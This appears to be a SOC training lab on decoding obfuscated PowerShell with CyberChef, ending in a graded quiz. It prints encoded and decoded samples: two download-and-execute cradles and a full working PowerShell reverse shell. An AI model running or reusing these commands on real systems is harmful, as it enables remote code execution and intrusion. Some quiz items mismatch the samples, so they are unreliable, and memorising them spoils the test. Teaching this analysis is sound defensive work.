What You'll Learn
- Decode a Base64-encoded PowerShell command using CyberChef to reveal the hidden payload
- Identify malicious indicators within the decoded script (download cradles, execution bypasses, C2 callbacks)
- Understand common PowerShell obfuscation techniques attackers use to evade detection
- Build a CyberChef recipe that chains multiple decoding operations together
- Extract IOCs (URLs, IPs, file paths) from the decoded payload and document them for threat intelligence
Lab Overview
| Detail | Value |
|---|---|
| Lab Profile | Browser-Only (no cloud container required) |
| Tools | CyberChef (gchq.github.io/CyberChef) |
| Estimated Time | 40–50 minutes |
| Difficulty | Intermediate |
| Browser Access | CyberChef in your web browser |
| Pre-Loaded Data | Encoded PowerShell strings provided below |
| Deliverable | CyberChef recipe screenshot + decoded payload analysis with extracted IOCs |
Why attackers encode payloads. Encoding is the attacker's first line of defense against detection. A Base64-encoded PowerShell command looks like random text to anyone glancing at logs — but underneath, it could be downloading malware, establishing reverse shells, or exfiltrating data. As a SOC analyst, you MUST be able to decode what you find.
Tool Setup
Open CyberChef in your browser. You'll see three panels:
| Panel | Purpose |
|---|---|
| Operations (left) | Drag decoding operations from here |
| Recipe (center-top) | Your chain of decoding steps |
| Input (center) | Paste the encoded string here |
| Output (bottom) | The decoded result appears here |
CyberChef is your Swiss Army knife. In a real SOC, you'll use CyberChef daily — decoding Base64, URL-encoded strings, hex dumps, XOR-encrypted payloads, and more. Bookmark it. Learn it. It will save you hours.
The Scenario
Your Wazuh SIEM flagged a process creation event (Windows Event ID 4688) on a workstation. The command line shows:
powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAyADQANQAuADQAMgAuADEAOQA4AC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=
The -Enc flag tells PowerShell to decode and execute the Base64 string. The other flags are also suspicious:
| Flag | Meaning | Why Attackers Use It |
|---|---|---|
-NoP | NoProfile — skip loading the user's PS profile | Faster execution, avoids custom logging |
-NonI | NonInteractive — no user prompts | Runs without waiting for input |
-W Hidden | WindowStyle Hidden — no visible window | User never sees the PowerShell window open |
-Enc | EncodedCommand — Base64 input | Hides the actual command from casual log review |
These flags together are a red flag. Any combination of -NoProfile, -NonInteractive, -WindowStyle Hidden, and -EncodedCommand on a workstation should trigger investigation. Legitimate scripts rarely need ALL of these flags simultaneously.
Part 1: Decode the First Payload
Step 1: Decode the Base64
- In CyberChef, paste ONLY the Base64 string (everything after
-Enc):
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAyADQANQAuADQAMgAuADEAOQA4AC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=
- From the Operations panel, drag "From Base64" into the Recipe
- The output will look garbled — you'll see
I.E.X. .(.with dots between characters
Step 2: Handle UTF-16LE Encoding
PowerShell uses UTF-16LE (Little Endian) encoding for its -Enc parameter, not plain ASCII. The dots between characters are null bytes.
- Remove the "From Base64" operation
- Instead, drag these operations in order:
- "From Base64"
- "Decode text" → set to UTF-16LE (1200)
Now the output should be readable:
IEX (New-Object Net.WebClient).DownloadString('http://192.245.42.198/payload.ps1')
This is a download cradle. IEX (Invoke-Expression) downloads and immediately executes a remote script. The attacker's server at 192.245.42.198 hosts the real payload. This is one of the most common PowerShell attack patterns.
Step 3: Analyze the Decoded Command
| Component | Value | Significance |
|---|---|---|
IEX | Invoke-Expression | Executes downloaded code directly in memory |
New-Object Net.WebClient | Creates HTTP client | Downloads content from the internet |
.DownloadString() | Downloads as string (not file) | Fileless — nothing written to disk |
| URL | http://192.245.42.198/payload.ps1 | Attacker's C2/staging server |
Extract these IOCs:
- IP: 192.245.42.198
- URL: http://192.245.42.198/payload.ps1
- File: payload.ps1
Part 2: Decode a More Complex Payload
Real attackers layer their encoding. Here's a more sophisticated sample from a different alert:
powershell.exe -NoP -W Hidden -Enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgA5ADkALgA5ADkALgA1ADAAJwAsADQANAA0ADQAKQA7ACQAcwA9ACQAYwAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAPQAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAPQAkAHMALgBSAGUAYQBkACgAJABiACwAMAAsACQAYgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAJABkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgAsADAALAAkAGkAKQA7ACQAcgA9ACgAaQBlAHgAIAAkAGQAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJAByADIAPQAkAHIAKwAnAFAAUwAgACcAKwAoAHAAdwBkACkALgBQAGEAdABoACsAJwA+ACAAJwA7ACQAYgAyAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHIAMgApADsAJABzAC4AVwByAGkAdABlACgAJABiADIALAAwACwAJABiADIALgBMAGUAbgBnAHQAaAApAH0A
Step 4: Apply the Same Recipe
Use the same CyberChef recipe (From Base64 → Decode text UTF-16LE). The decoded output reveals:
$c=New-Object Net.Sockets.TCPClient('10.99.99.50',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$b2=([text.encoding]::ASCII).GetBytes($r2);$s.Write($b2,0,$b2.Length)}
Step 5: Analyze the Reverse Shell
This is a PowerShell reverse shell. Break it down:
| Component | What It Does |
|---|---|
TCPClient('10.99.99.50',4444) | Connects to attacker's listener |
GetStream() | Opens a bidirectional data stream |
while(Read...) | Continuously reads commands from attacker |
iex $d | Executes each command received |
Write($b2...) | Sends output back to attacker |
'PS '+(pwd).Path+'> ' | Sends a PS prompt to make it look like a real shell |
Extract these IOCs:
- Internal IP (C2 listener): 10.99.99.50
- Port: 4444 (common Metasploit default)
- Technique: Reverse shell (T1059.001 — PowerShell)
Port 4444 is a dead giveaway. Metasploit's default listener port is 4444. While sophisticated attackers change this, many don't bother. If you see outbound connections to port 4444, investigate immediately.
Part 3: URL-Encoded Layer
Sometimes attackers add URL encoding on top of Base64. Decode this string:
powershell%20-Enc%20JABwAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALQBzAHQAYQB0AGkAYwAuAHUAcABkAGEAdABlAC0AcwBlAHIAdgBpAGMAZQAuAG4AZQB0AC8AYQBzAHMAZQB0AHMALwBmAG8AbgB0AC4AdwBvAGYAZgAnADsASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABwACkA
Step 6: Chain Three Operations
Build a 3-step CyberChef recipe:
- URL Decode — removes %20, %2F, etc.
- Regular Expression — extract just the Base64 string after
-Enc- Pattern:
[A-Za-z0-9+/=]{20,}
- Pattern:
- From Base64 → Decode text (UTF-16LE)
The decoded result reveals a download cradle to https://cdn-static.update-service.net/assets/font.woff — a fake CDN URL disguising malware as a font file.
IOCs:
- Domain: cdn-static.update-service.net
- URL: https://cdn-static.update-service.net/assets/font.woff
- Technique: Masquerading as legitimate CDN content
Deliverable
Create a document with:
1. CyberChef Recipes
Screenshot each recipe showing the decoding chain used.
2. Decoded Payload Analysis Table
| Sample | Decoded Command | Malicious Behavior | MITRE Technique |
|---|---|---|---|
| Sample 1 | IEX download cradle | Downloads and executes remote script | T1059.001 (PowerShell) + T1105 (Ingress Tool Transfer) |
| Sample 2 | Reverse shell | Establishes interactive C2 channel | T1059.001 + T1571 (Non-Standard Port) |
| Sample 3 | Disguised download | Downloads malware masquerading as font file | T1059.001 + T1036 (Masquerading) |
3. IOC Table
| Type | Value | Context |
|---|---|---|
| IP | 192.245.42.198 | Staging server for payload.ps1 |
| IP | 10.99.99.50 | Internal C2 listener (port 4444) |
| Domain | cdn-static.update-service.net | Fake CDN hosting malware |
| URL | http://192.245.42.198/payload.ps1 | Download cradle target |
| URL | https://cdn-static.update-service.net/assets/font.woff | Disguised malware download |
| Port | 4444 | Reverse shell listener (Metasploit default) |
Key Takeaways
- PowerShell's -Enc flag uses UTF-16LE encoding, not plain Base64 — always add the Decode text step in CyberChef
- The combination of -NoProfile, -NonInteractive, -WindowStyle Hidden, and -EncodedCommand is a strong malicious indicator
- Download cradles (IEX + DownloadString) execute code directly in memory — nothing written to disk
- Reverse shells create persistent C2 channels by connecting back to the attacker's listener
- Attackers layer encoding (URL + Base64 + UTF-16LE) to evade automated detection
- Always extract ALL IOCs from decoded payloads: IPs, domains, URLs, ports, file paths
- CyberChef recipes can be saved and shared with your team for consistent analysis
What's Next
Lab 6.4 is the ultimate triage test: the Alert Queue Challenge. You'll face 50 alerts spanning 8 hours of simulated SOC activity and must prioritize, triage, and produce a professional shift handoff note — the skill that separates junior analysts from reliable team members.
Lab Challenge: Decode the Payload
10 questions · 70% to pass
In the first encoded sample, what CyberChef recipe steps are needed to decode a PowerShell -Enc parameter?
The first decoded payload contains 'IEX (New-Object Net.WebClient).DownloadString(...)'. What does IEX do?
What IP and port does the second decoded sample (reverse shell) connect to?
Port 4444 is commonly associated with which offensive security tool's default configuration?
In the third sample, the attacker disguised the download URL as 'cdn-static.update-service.net/assets/font.woff'. What MITRE ATT&CK technique does this represent?
Why does the -WindowStyle Hidden flag make a PowerShell command more suspicious?
The second decoded sample uses '.DownloadString()' instead of '.DownloadFile()'. What is the security implication of this choice?
When decoding the third sample, you need to URL decode first because the original string contains '%20' and '%2F'. What do these URL-encoded characters represent?
How many total unique IOCs should you extract from all three decoded samples in this lab?
An analyst finds a PowerShell command using -Enc but with ONLY the -NoProfile flag (no Hidden, no NonInteractive). The decoded command runs 'Get-ADUser -Filter * | Export-CSV users.csv'. Is this likely malicious?
0/10 answered